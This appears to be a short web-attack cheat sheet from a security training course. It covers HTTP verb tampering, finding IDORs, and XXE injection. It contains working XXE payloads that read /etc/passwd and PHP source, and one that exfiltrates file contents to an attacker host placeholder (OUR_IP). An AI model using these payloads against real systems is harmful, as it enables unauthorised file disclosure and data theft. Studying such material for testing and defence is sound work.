Web Attacks
HTTP Verb Tampering
HEADPUTDELETEOPTIONSPATCH
| Command | Description |
|---|---|
-X OPTIONS | Set HTTP Method with Curl |
Identify IDORS
- In URL parameters & APIs
- In AJAX Calls
- By understanding reference hashing/encoding
- By comparing user roles
| Command | Description |
|---|---|
md5sum | MD5 hash a string |
base64 | Base64 encode a string |
XXE
| Code | Description |
|---|---|
<!ENTITY xxe SYSTEM "http://localhost/email.dtd"> | Define External Entity to a URL |
<!ENTITY xxe SYSTEM "file:///etc/passwd"> | Define External Entity to a file path |
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> | Read PHP source code with base64 encode filter |
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>"> | Reading a file through a PHP error |
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>"> | Reading a file OOB exfiltration |